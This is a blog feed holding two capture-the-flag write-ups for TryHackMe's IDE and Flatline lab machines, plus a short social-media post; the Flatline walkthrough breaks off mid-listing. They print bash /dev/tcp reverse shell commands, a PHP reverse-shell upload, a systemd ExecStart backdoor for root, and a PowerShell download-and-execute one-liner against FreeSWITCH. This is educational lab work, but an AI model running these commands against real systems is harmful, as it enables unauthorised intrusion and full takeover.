DEV Community: Krishna

TryHackme IDE Writeup

Krishna — Tue, 08 Nov 2022 10:57:54 +0000

Link to machine page on TryHackme => https://tryhackme.com/room/ide

Enumeration

rustscan nmap

└─$ rustscan -a 10.10.134.57 -- -A    

Open 10.10.134.57:21
Open 10.10.134.57:22
Open 10.10.134.57:80
Open 10.10.134.57:62337

PORT      STATE SERVICE REASON  VERSION
21/tcp    open  ftp     syn-ack vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:YOUR_IP
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp    open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e2:be:d3:3c:e8:76:81:ef:47:7e:d0:43:d4:28:14:28 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC94RvPaQ09Xx+jMj32opOMbghuvx4OeBVLc+/4Hascmrtsa+SMtQGSY7b+eyW8Zymxi94rGBIN2ydPxy3XXGtkaCdQluOEw5CqSdb/qyeH+L/1PwIhLrr+jzUoUzmQil+oUOpVMOkcW7a00BMSxMCij0HdhlVDNkWvPdGxKBviBDEKZAH0hJEfexz3Tm65cmBpMe7WCPiJGTvoU9weXUnO3+41Ig8qF7kNNfbHjTgS0+XTnDXk03nZwIIwdvP8dZ8lZHdooM8J9u0Zecu4OvPiC4XBzPYNs+6ntLziKlRMgQls0e3yMOaAuKfGYHJKwu4AcluJ/+g90Hr0UqmYLHEV
|   256 a8:82:e9:61:e4:bb:61:af:9f:3a:19:3b:64:bc:de:87 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBzKTu7YDGKubQ4ADeCztKu0LL5RtBXnjgjE07e3Go/GbZB2vAP2J9OEQH/PwlssyImSnS3myib+gPdQx54lqZU=
|   256 24:46:75:a7:63:39:b6:3c:e9:f1:fc:a4:13:51:63:20 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ+oGPm8ZVYNUtX4r3Fpmcj9T9F2SjcRg4ansmeGR3cP
80/tcp    open  http    syn-ack Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
62337/tcp open  http    syn-ack Apache httpd 2.4.29 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: B4A327D2242C42CF2EE89C623279665F
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Codiad 2.8.4
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Web servers are running on both port 80 and 62337.

On port 62337, there seems to be an application running - Codiad 2.8.4.

Searching for it on Google yields this => https://github.com/Codiad/Codiad. Its a Cloud based IDE, hence the name of the machine I guess.

FTP Server Enum

The server seems to be support anonymous login(from nmap output). Let's see what we can get from it.

└─$ ftp ide.thm
Connected to ide.thm.
220 (vsFTPd 3.0.3)
Name (ide.thm:kali): Anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||16569|)
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -la
229 Entering Extended Passive Mode (|||24477|)
150 Here comes the directory listing.
drwxr-xr-x    3 0        114          4096 Jun 18  2021 .
drwxr-xr-x    3 0        114          4096 Jun 18  2021 ..
drwxr-xr-x    2 0        0            4096 Jun 18  2021 ...
226 Directory send OK.
ftp> cd ...
250 Directory successfully changed.
ftp> ls -la
229 Entering Extended Passive Mode (|||15019|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0             151 Jun 18  2021 -
drwxr-xr-x    2 0        0            4096 Jun 18  2021 .
drwxr-xr-x    3 0        114          4096 Jun 18  2021 ..
ftp> get -
local: - remote: -
229 Entering Extended Passive Mode (|||16831|)
150 Opening BINARY mode data connection for - (151 bytes).
100% |****************************************************************************************************************|   151      150.93 KiB/s    00:00 ETA
226 Transfer complete.
151 bytes received in 00:00 (0.85 KiB/s)
ftp> exit
221 Goodbye.

After downloading it, let's rename THE - file and see what's inside.

┌──(kali㉿kali)-[~/Documents/ctf/thm_easy_ide]
└─$ mv - ftp_file                      

└─$ cat ftp_file            
Hey john,
I have reset the password as you have asked. Please use the default password to login. 
Also, please take care of the image file ;)
- drac.

So there's two possible usernames john and drac.

Web Server Enum [Port 80]

Let's see if we can find anything interesting here.

root@ip-10-10-0-98:~/ide# ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-large-directories.txt -u http://ide.thm/FUZZ -o ffuf/raftLarge -of html -ic -r -recursion -c -e .txt,.html,.bak,.gz,.zip,.php,.db,.sql,.tar.gz -sf

index.html              [Status: 200, Size: 10918, Words: 3499, Lines: 376]
server-status           [Status: 403, Size: 272, Words: 20, Lines: 10]
.php                    [Status: 403, Size: 272, Words: 20, Lines: 10]
.html                   [Status: 403, Size: 272, Words: 20, Lines: 10]
                        [Status: 200, Size: 10918, Words: 3499, Lines: 376]
.html                   [Status: 403, Size: 272, Words: 20, Lines: 10]
.php                    [Status: 403, Size: 272, Words: 20, Lines: 10]
                        [Status: 200, Size: 10918, Words: 3499, Lines: 376]
index.html              [Status: 200, Size: 10918, Words: 3499, Lines: 376]

:: Progress: [622750/622750] :: Job [1/1] :: 10508 req/sec :: Duration: [0:01:05] :: Errors: 30 ::

root@ip-10-10-0-98:~/ide# ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt -u http://ide.thm/FUZZ -o ffuf/big -of html -ic -r -recursion -c -e .txt,.html,.bak,.gz,.zip,.php,.db,.sql,.tar.gz -sf

:: Progress: [204730/204730] :: Job [1/1] :: 12140 req/sec :: Duration: [0:00:22] :: Errors: 0 ::

root@ip-10-10-0-98:~/ide# ffuf -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u http://ide.thm/FUZZ -o ffuf/dirMedium -of html -ic -r -recursion -c -e .txt,.html,.bak,.gz,.zip,.php,.db,.sql,.tar.gz -sf

:: Progress: [2076300/2076300] :: Job [1/1] :: 3482 req/sec :: Duration: [0:06:32] :: Errors: 0 ::

Nothing here at all for us it seems. Let's move on.

Web Server Enum [Port 62337]

When we visit the site http://ide.thm:62337, there is a login portal.

admin:admin does not work. Neither does john:admin or drac:admin.

There are RCE exploits available for Codiad 2.8.4, but they require authentication. We will have to find a way to get the creds.

In the mean time, let's fuzz the portal and see what we can find.

root@ip-10-10-0-98:~/ide# ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-large-directories.txt -u http://ide.thm:62337/FUZZ -o ffuf/raftLarge -of html -ic -r -recursion -c -e .txt,.html,.bak,.gz,.zip,.php,.db,.sql,.tar.gz -sf

js                      [Status: 200, Size: 3697, Words: 229, Lines: 30]
plugins                 [Status: 200, Size: 937, Words: 62, Lines: 17]
themes                  [Status: 200, Size: 1131, Words: 75, Lines: 18]
components              [Status: 200, Size: 3938, Words: 244, Lines: 32]
data                    [Status: 200, Size: 1944, Words: 134, Lines: 22]
lib                     [Status: 200, Size: 1173, Words: 78, Lines: 18]
config.php              [Status: 200, Size: 0, Words: 1, Lines: 1]
common.php              [Status: 200, Size: 0, Words: 1, Lines: 1]
languages               [Status: 200, Size: 4609, Words: 305, Lines: 36]
index.php               [Status: 200, Size: 5239, Words: 1739, Lines: 87]
INSTALL.txt             [Status: 200, Size: 634, Words: 93, Lines: 22]
workspace               [Status: 200, Size: 941, Words: 66, Lines: 17]
server-status           [Status: 403, Size: 275, Words: 20, Lines: 10]
.html                   [Status: 403, Size: 275, Words: 20, Lines: 10]
.php                    [Status: 403, Size: 275, Words: 20, Lines: 10]
                        [Status: 200, Size: 5239, Words: 1739, Lines: 87]
LICENSE.txt             [Status: 200, Size: 1133, Words: 191, Lines: 21]
style_guide.php         [Status: 200, Size: 24394, Words: 7692, Lines: 328]
.php                    [Status: 403, Size: 275, Words: 20, Lines: 10]
                        [Status: 200, Size: 5239, Words: 1739, Lines: 87]
.html                   [Status: 403, Size: 275, Words: 20, Lines: 10]

:: Progress: [622750/622750] :: Job [1/1] :: 9664 req/sec :: Duration: [0:02:45] :: Errors: 30 ::

Dir listing seems to be enabled. Some examples

Now I go back to the login page and take a guess at the password, since the notes in the FTP server mentioned "default password".

john:CENSORED.

HINT: This is a very commonly used password and I got lucky when I guessed it.

Now let's try and use those exploits to see if we can get some RCE.

└─$ searchsploit codiad 2.8.4
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                             |  Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Codiad 2.8.4 - Remote Code Execution (Authenticated)                                                                       | multiple/webapps/49705.py
Codiad 2.8.4 - Remote Code Execution (Authenticated) (2)                                                                   | multiple/webapps/49902.py
Codiad 2.8.4 - Remote Code Execution (Authenticated) (3)                                                                   | multiple/webapps/49907.py
Codiad 2.8.4 - Remote Code Execution (Authenticated) (4)                                                                   | multiple/webapps/50474.txt
--------------------------------------------------------------------------------------------------------------------------- --------------------------------

Foothold

Let's use this exploit => https://www.exploit-db.com/exploits/49705

Running the exploit.

└─$ python3 49705.py http://10.10.180.194:62337/ john CENSORED YOUR_IP 4444 linux
[+] Please execute the following command on your vps: 
echo 'bash -c "bash -i >/dev/tcp/YOUR_IP/4445 0>&1 2>&1"' | nc -lnvp 4444
nc -lnvp 4445
[+] Please confirm that you have done the two command above [y/n]
[Y/n] Y
[+] Starting...
[+] Login Content : {"status":"success","data":{"username":"john"}}
[+] Login success!
[+] Getting writeable path...
[+] Path Content : {"status":"success","data":{"name":"CloudCall","path":"\/var\/www\/html\/codiad_projects"}}
[+] Writeable Path : /var/www/html/codiad_projects
[+] Sending payload...

--- ---

└─$ echo 'bash -c "bash -i >/dev/tcp/YOUR_IP/4445 0>&1 2>&1"' | nc -lnvp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.180.194.
Ncat: Connection from 10.10.180.194:38116.

┌──(kali㉿kali)-[~/Documents/ctf/thm_easy_ide]

--- ---

└─$ ncat -lnvp 4445                             
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4445
Ncat: Listening on 0.0.0.0:4445
Ncat: Connection from 10.10.180.194.
Ncat: Connection from 10.10.180.194:47536.
bash: cannot set terminal process group (906): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ide:/var/www/html/codiad/components/filemanager$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@ide:/var/www/html/codiad/components/filemanager$

Now, this process of starting a reverse shell is pretty complicated. So instead, I am gonna upload a reverse shell.

Uploaded my own PHP reverse shell using nc. Remember that dir listing is enabled. So we can access it directly at http://ide.thm:62337/data/rshell.php

www-data@ide:/var/www/html/codiad/data$ ls -l
total 36
-rw-r--r-- 1 www-data www-data   18 Jun 18  2021 README
-rw-r--r-- 1 www-data www-data  311 Nov  8 07:48 active.php
drwxr-xr-x 2 www-data www-data 4096 Nov  8 07:46 cache
-rw-r--r-- 1 www-data www-data   82 Jun 18  2021 projects.php
-rw-r--r-- 1 www-data www-data 5493 Nov  8 08:11 rshell.php
-rw-r--r-- 1 www-data www-data   52 Jun 18  2021 settings.php
-rw-r--r-- 1 www-data www-data  138 Nov  8 07:46 users.php
-rw-r--r-- 1 www-data www-data   79 Jun 18  2021 version.php

We cannot read user.txt in /home/drac. We will need to find a way to pivot to the drac user.

www-data@ide:/home/drac$ ls -l
total 4
-r-------- 1 drac drac 33 Jun 18  2021 user.txt

Privesc

lse run

Running lse first. Note the very old Linux Kernel.


ser: www-data
     User ID: 33
    Password: none
        Home: /var/www
        Path: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
       umask: 0000

    Hostname: ide
       Linux: 4.15.0-147-generic
Distribution: Ubuntu 18.04.5 LTS
Architecture: x86_64

[*] usr020 Are there other users in administrative groups?................. yes!
---
adm:x:4:syslog
sudo:x:27:drac
---
[*] usr030 Other users with shell.......................................... yes!
---
root:x:0:0:root:/root:/bin/bash
drac:x:1000:1000:drac:/home/drac:/bin/bash

[*] sud050 Do we know if any other users used sudo?........................ yes!
---
drac

[*] fst100 Useful binaries................................................. yes!
---
/usr/bin/curl
/usr/bin/dig
/bin/nc.openbsd
/bin/nc
/bin/netcat
/usr/bin/wget

[*] sys050 Can root user log in via SSH?................................... yes!
---
PermitRootLogin yes

[*] pro020 Processes running with root permissions......................... yes!
---
START      PID     USER COMMAND
START      PID     USER COMMAND
08:24    28942     root sleep 15                                                                                                                             
08:24    28939     root /bin/sh -c for i in 0 1 2 3; do rm -rf /var/www/html/config.php /var/www/html/data & sleep 15; done;
08:24    28938     root /usr/sbin/CRON -f
08:23     5438     root sleep 15
08:23     2632     root sleep 15
08:23     2630     root /bin/sh -c for i in 0 1 2 3; do rm -rf /var/www/html/config.php /var/www/html/data & sleep 15; done;

[!] cve-2021-4034 Checking for PwnKit vulnerability........................ yes!
---
Vulnerable! polkit version: 0.105-20ubuntu0.18.04.5

That process running as root, where the config.php is being deleted is interesting. The thing is, those files config.php and data don't exist.

linpeas run

═══════════════════════════════╣ Basic information ╠═══════════════════════════════                                                                          
OS: Linux version 4.15.0-147-generic (buildd@lcy01-amd64-028) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #151-Ubuntu SMP Fri Jun 18 19:21:19 UTC 2021
User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Hostname: ide
Writable folder: /dev/shm

╔══════════╣ CVEs Check
Vulnerable to CVE-2021-4034                                                                                                                                  

Potentially Vulnerable to CVE-2022-2588

════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════                                                                           
                ╚════════════════════════════════════════════════╝                                                                                           
╔══════════╣ Cleaned processes
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes     

root       841  0.0  0.3  30028  3180 ?        Ss   07:11   0:00 /usr/sbin/cron -f
root      2628  0.0  0.3  57500  3200 ?        S    08:23   0:00  _ /usr/sbin/CRON -f
root      2630  0.0  0.0   4628   808 ?        Ss   08:23   0:00      _ /bin/sh -c for i in 0 1 2 3; do rm -rf /var/www/html/config.php /var/www/html/data & sleep 15; done;

╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash                                                                                                                              

╔══════════╣ Users with console
drac:x:1000:1000:drac:/home/drac:/bin/bash                                                                                                                   
root:x:0:0:root:/root:/bin/bash

╔══════════╣ Useful software
/usr/bin/base64                                                                                                                                              
/usr/bin/curl
/usr/bin/lxc
/bin/nc
/bin/netcat
/usr/bin/perl
/usr/bin/php
/bin/ping
/usr/bin/python3
/usr/bin/python3.6
/usr/bin/sudo
/usr/bin/wget

╔══════════╣ Installed Compilers
/usr/share/gcc-8                             

╔══════════╣ Searching passwords in history files
mysql -u drac -p 'CENSORED'

Well well we hit the jackpot. To confirm this, let's go check the history file ourselves.

www-data@ide:/home/drac$ cat .bash_history 
mysql -u drac -p 'CENSORED'

Should have checked the history file first saved ourselves some time. Anyway, let's try ssh login with these creds.
Success!!

drac@ide:~$ id
uid=1000(drac) gid=1000(drac) groups=1000(drac),24(cdrom),27(sudo),30(dip),46(plugdev)

No need for the reverse shell any more.

Privesc from drac to root

drac@ide:~$ sudo -l
[sudo] password for drac: 
Matching Defaults entries for drac on ide:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User drac may run the following commands on ide:
    (ALL : ALL) /usr/sbin/service vsftpd restart

Interesting. This was confusing to look at first.

But if you have installed software and administered a system before, you would recognize the command.

vsftpd has been configured to run as a systemd service. The usual command to check the service status is systemctl status vsftpd. Any guide to installing and configuring vsftpd should have similar commands. Example -> https://www.howtoforge.com/tutorial/install-and-configure-vsftpd-server-on-ubuntu-1804/

Anyway, let's check the service status

drac@ide:/dev/shm$ systemctl status vsftpd
● vsftpd.service - vsftpd FTP server
   Loaded: loaded (/lib/systemd/system/vsftpd.service; enabled; vendor preset: enabled)
   Active: active (running) since Tue 2022-11-08 09:28:50 UTC; 27min ago
  Process: 1278 ExecStartPre=/bin/mkdir -p /var/run/vsftpd/empty (code=exited, status=0/SUCCESS)
 Main PID: 1289 (vsftpd)
    Tasks: 1 (limit: 1103)
   CGroup: /system.slice/vsftpd.service
           └─1289 /usr/sbin/vsftpd /etc/vsftpd.conf

You can not only check the status but also stop, start and restart the service, with the right permissions.

The file of interest to us here is /lib/systemd/system/vsftpd.service. Contents of said file as follows:

[Unit]
Description=vsftpd FTP server
After=network.target

[Service]
Type=simple
ExecStart=/usr/sbin/vsftpd /etc/vsftpd.conf
ExecReload=/bin/kill -HUP $MAINPID
ExecStartPre=-/bin/mkdir -p /var/run/vsftpd/empty

[Install]
WantedBy=multi-user.target

Let's see if we have permissions to modify this file

drac@ide:/dev/shm$ ls -l /lib/systemd/system/

-rw-rw-r-- 1 root drac  248 Aug  4  2021 vsftpd.service

Yes we do :)

Let's modify the ExecStart attribute in the config file, to create a TCP reverse shell to send us a connection whenever the service is restarted.

ExecStart=/bin/bash -c "bash -i >& /dev/tcp/YOUR_IP/443 0>&1 ; /usr/sbin/vsftpd /etc/vsftpd.conf"

You will need to run systemctl daemon-reload after modifying the file to reload the config. Source: https://www.shellhacks.com/systemd-service-file-example/

drac@ide:/dev/shm$ cp /lib/systemd/system/vsftpd.service vsftpd.service.bak
drac@ide:/dev/shm$ vim /lib/systemd/system/vsftpd.service 
drac@ide:/dev/shm$ systemctl daemon-reload
==== AUTHENTICATING FOR org.freedesktop.systemd1.reload-daemon ===
Authentication is required to reload the systemd state.                                                                                                      
Authenticating as: drac
Password: 
==== AUTHENTICATION COMPLETE ===
drac@ide:/dev/shm$ systemctl status vsftpd.service                                                                                               
● vsftpd.service - vsftpd FTP server
   Loaded: loaded (/lib/systemd/system/vsftpd.service; enabled; vendor preset: enabled)
   Active: active (running) since Tue 2022-11-08 10:09:52 UTC; 8min ago
 Main PID: 30361 (vsftpd)
    Tasks: 1 (limit: 1103)
   CGroup: /system.slice/vsftpd.service
           └─30361 /usr/sbin/vsftpd /etc/vsftpd.conf

Its good to check the service status again, to ensure that our modification of the vsftpd.service file did not result in any errors. Otherwise we would see a "Loaded: error"

NOTE: Initially I did not add the /bin/bash -c part to the ExecStart string. Its only after getting errors and asking for a hint on the THM Discord that I figured out that it had to be done this way.

Now, the moment of truth.

drac@ide:/dev/shm$ sudo /usr/sbin/service vsftpd restart

---
└─$ ncat -lnvp 443 
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.180.194.
Ncat: Connection from 10.10.180.194:56246.
bash: cannot set terminal process group (31614): Inappropriate ioctl for device
bash: no job control in this shell
root@ide:/# id
id
uid=0(root) gid=0(root) groups=0(root)
root@ide:/#

DONE!! Have a great day!!

Mastodon Verification Post

Krishna — Mon, 07 Nov 2022 07:19:35 +0000

You can find my profile here => Mastodon

Have a great day!

TryHackMe Flatline Walkthrough

Krishna — Sun, 06 Nov 2022 13:19:35 +0000

TryHackMe page for this machine => https://tryhackme.com/room/flatline

NOTE: I had to terminate and start the machine multiple times, as the exploit needed for foothold timed out multiple times. You may have to do the same.

Enum

rustscan nmap

rustscan -a 10.10.98.113 -- -A -Pn

Open 10.10.98.113:3389
Open 10.10.98.113:8021

PORT     STATE SERVICE          REASON  VERSION
3389/tcp open  ms-wbt-server    syn-ack Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: WIN-EOM4PK0578N
|   NetBIOS_Domain_Name: WIN-EOM4PK0578N
|   NetBIOS_Computer_Name: WIN-EOM4PK0578N
|   DNS_Domain_Name: WIN-EOM4PK0578N
|   DNS_Computer_Name: WIN-EOM4PK0578N
|   Product_Version: 10.0.17763
|_  System_Time: 2022-11-06T09:40:13+00:00
| ssl-cert: Subject: commonName=WIN-EOM4PK0578N
| Issuer: commonName=WIN-EOM4PK0578N
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-05T09:12:21
| Not valid after:  2023-05-07T09:12:21
| MD5:   3090 28ea a18f 37ce f134 275b 8a11 85b7
| SHA-1: 0594 e942 a7b3 ca04 7e4e 625c 6c0b 6903 f089 dde0
| -----BEGIN CERTIFICATE-----
| MIIC4jCCAcqgAwIBAgIQd/ojPAXxV75Ihn2h8kAwfTANBgkqhkiG9w0BAQsFADAa
| MRgwFgYDVQQDEw9XSU4tRU9NNFBLMDU3OE4wHhcNMjIxMTA1MDkxMjIxWhcNMjMw
| NTA3MDkxMjIxWjAaMRgwFgYDVQQDEw9XSU4tRU9NNFBLMDU3OE4wggEiMA0GCSqG
| SIb3DQEBAQUAA4IBDwAwggEKAoIBAQClNnOLEC5U40F8dFZZtmmSj8zVa4Fqd0fU
| 3O+Pf/sDLF/23s4R6LkjvmjZaGNWMAVzlKwOMYJ3umlmLTRJJF0DEnaM79phGLba
| ePPbdRiUjUQFdBK9tyPpYCLB2m+K1z0YJLoXt8br7WSVp7Ho8Sz2E6sBZRM5H6QN
| ptO8j/syFSdLYWusTAp/gEQpVUoiElFcmDfa7rP2gQELHb03EvL9Gz9lPRrrVA3r
| XzEUNuqkG4J70LenFv7AH1j70FL48UStBESKYLaXaruRN8TkVjRWhmrYhC7tMVRB
| h8oVb8bcCvwqsw7VYEy197AdyePV0fkvjfbyrp6tstPMVm4hFM2FAgMBAAGjJDAi
| MBMGA1UdJQQMMAoGCCsGAQUFBwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQsF
| AAOCAQEAfv/F86NeGYpqgaQz5Q+R5FrYkqnZoZBxrlbpG8rB9+hixOjRs6s6skjy
| x0IYovOcSXI3Sy4dh3GRjWn+hv5szbYzb4hKQojzw7CNScJSbTyGh7sJuGv1+hUe
| F6izAORicQkApcLweXv5MyVj1qUrmwWo4DpbG34nIf6W6hpNlW2VdWfCqIfjnEvy
| 3LOWrn++sncxXdBmg24fDNohJJFgvp3ui7VbmYVepe1SmqIql7vKt+qMV2kZv+cg
| SU1pZqYrHwwcpD3Qx6R7oqSVHjulW1eGTC6t+au8Oc6rytgamvbrCIGAwSUVcJLt
| pVkvw++/yMtWLoiiT+RCa2abEwEcPw==
|_-----END CERTIFICATE-----
|_ssl-date: 2022-11-06T09:40:13+00:00; 0s from scanner time.
8021/tcp open  freeswitch-event syn-ack FreeSWITCH mod_event_socket
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 0s, deviation: 0s, median: 0s

Note: The machine keeps blocking ping probes. So use the nmap-Pn flag when enumerating the machine!.

Port 3389 Enumeration

Let's use some nmap scripts to enumerate the port some more.

└─$ sudo nmap --script="rdp-*" -p 3389 flatline.thm -vv -Pn

PORT     STATE SERVICE       REASON
3389/tcp open  ms-wbt-server syn-ack ttl 127
| rdp-ntlm-info: 
|   Target_Name: WIN-EOM4PK0578N
|   NetBIOS_Domain_Name: WIN-EOM4PK0578N
|   NetBIOS_Computer_Name: WIN-EOM4PK0578N
|   DNS_Domain_Name: WIN-EOM4PK0578N
|   DNS_Computer_Name: WIN-EOM4PK0578N
|   Product_Version: 10.0.17763
|_  System_Time: 2022-11-06T09:55:55+00:00
| rdp-enum-encryption: 
|   Security layer
|     CredSSP (NLA): SUCCESS
|     CredSSP with Early User Auth: SUCCESS
|_    RDSTLS: SUCCESS

Port 8021 Enumeration

I wanted to see what in the world FreeSWITCH is. From Wikipedia https://en.wikipedia.org/wiki/FreeSWITCH

**FreeSWITCH* is free and open-source server software for real-time communication applications, including WebRTC, video, and voice over Internet Protocol (VoIP). It runs on Linux, Windows, macOS, and FreeBSD. FreeSWITCH is used to build private branch exchange (PBX) telecommunication systems, IVR services, videoconferencing with chat and screen sharing, wholesale least-cost routing, Session Border Controller (SBC) and embedded communication appliances.*

Let's look for some vulnerabilities.

└─$ searchsploit freeswitch                                
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                             |  Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
FreeSWITCH - Event Socket Command Execution (Metasploit)                                                                   | multiple/remote/47698.rb
FreeSWITCH 1.10.1 - Command Execution                                                                                      | windows/remote/47799.txt
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Interesting. Let's try and get RCE without Metasploit.

Foothold

RCE without Metasploit

Using the script present here => https://www.exploit-db.com/exploits/47799

└─$ python3 exploit.py flatline.thm whoami
Authenticated
Content-Type: api/response
Content-Length: 25

win-eom4pk0578n\nekrotic

Looks like it works! Let's try and get a proper shell going on here.

└─$ python3 exploit.py 10.10.7.242 dir   
Authenticated
Content-Type: api/response
Content-Length: 2346

 Volume in drive C has no label.
 Volume Serial Number is 84FD-2CC9

 Directory of C:\Program Files\FreeSWITCH

09/11/2021  07:38    <DIR>          .
09/11/2021  07:38    <DIR>          ..
09/11/2021  07:22    <DIR>          cert
09/11/2021  07:22    <DIR>          conf
06/11/2022  10:33    <DIR>          db
09/11/2021  07:18    <DIR>          fonts
20/08/2019  12:08         4,991,488 FreeSwitch.dll
20/08/2019  12:08            26,624 FreeSwitchConsole.exe
20/08/2019  12:19            62,976 fs_cli.exe
09/11/2021  07:18    <DIR>          grammar
---
SNIP
---
24/03/2018  20:20        15,766,528 v8.dll
24/03/2018  20:05           177,152 v8_libbase.dll
24/03/2018  20:19           134,656 v8_libplatform.dll
03/04/2018  14:01           126,976 zlib.dll
              28 File(s)     96,800,060 bytes
              17 Dir(s)  50,476,666,880 bytes free

Let's try and get the user flag.

└─$ python3 exploit.py 10.10.7.242 "dir C:\\Users\\"
Authenticated
Content-Type: api/response
Content-Length: 405

 Volume in drive C has no label.
 Volume Serial Number is 84FD-2CC9

 Directory of C:\Users

09/11/2021  07:28    <DIR>          .
09/11/2021  07:28    <DIR>          ..
09/11/2021  07:13    <DIR>          Administrator
09/11/2021  07:37    <DIR>          Nekrotic
09/11/2021  07:13    <DIR>          Public
               0 File(s)              0 bytes
               5 Dir(s)  50,457,559,040 bytes free

└─$ python3 exploit.py 10.10.7.242 "dir C:\\Users\\Nekrotic\\Desktop\\"
Authenticated
Content-Type: api/response
Content-Length: 374

 Volume in drive C has no label.
 Volume Serial Number is 84FD-2CC9

 Directory of C:\Users\Nekrotic\Desktop

09/11/2021  07:39    <DIR>          .
09/11/2021  07:39    <DIR>          ..
09/11/2021  07:39                38 root.txt
09/11/2021  07:39                38 user.txt
               2 File(s)             76 bytes
               2 Dir(s)  50,446,991,360 bytes free

Wow. We seem to have found both files. We can read user.txt.

But we can't read root.txt. Probably a permissions issue.

Let's get a powershell reverse shell to see what's really going on.

Powershell Reverse Shell

Save this file https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1
Delete the second shell comment. As for the first one, uncomment and replace IP and PORT as per your choice.
Start a Python web server in the folder where you saved the powershell script. This is what we will use to serve the script.
Download and execute the script on remote machine using the FreeSWITCH exploit.

Running the exploit

┌──(kali㉿kali)-[~/Documents/ctf/thm_easy_flatline]
└─$ python3 exploit.py 10.10.7.242 "powershell IEX (New-Object Net.WebClient).DownloadString('http://10.14.31.78/Invoke-PowerShellTcpOneLine.ps1')"

Run the web server to serve the Powershell reverse shell

└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.7.242 - - [06/Nov/2022 06:20:12] "GET /Invoke-PowerShellTcpOneLine.ps1 HTTP/1.1" 200 -

Reverse Shell listener

┌──(kali㉿kali)-[~]
└─$ ncat -lnvp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.7.242.
Ncat: Connection from 10.10.7.242:49899.

PS C:\Program Files\FreeSWITCH> gci


    Directory: C:\Program Files\FreeSWITCH


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----       09/11/2021     07:22                cert                                                                  
d-----       09/11/2021     07:22                conf                                                                  
d-----       06/11/2022     10:33                db                                                                    
d-----       09/11/2021     07:18                fonts                                                                 
d-----       09/11/2021     07:18                grammar    
....
SNIP
....

PS C:\Users\Nekrotic\Desktop> get-acl -path user.txt

    Directory: C:\Users\Nekrotic\Desktop

Path     Owner                    Access                                                                               
----     -----                    ------                                                                               
user.txt WIN-EOM4PK0578N\Nekrotic NT AUTHORITY\SYSTEM Allow  FullControl...  

PS C:\Users\Nekrotic\Desktop> get-acl -Path root.txt

    Directory: C:\Users\Nekrotic\Desktop

Path     Owner               Access                                
----     -----               ------                                
root.txt NT AUTHORITY\SYSTEM NT AUTHORITY\SYSTEM Allow  FullControl

Now we can see why we can't read root.txt. We will need to escalate privileges to be able to read the file.

Privesc

While taking a look around the system, I came across this in the Administrator's desktop


PS C:\Users\Administrator\Desktop> gci

    Directory: C:\Users\Administrator\Desktop

Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
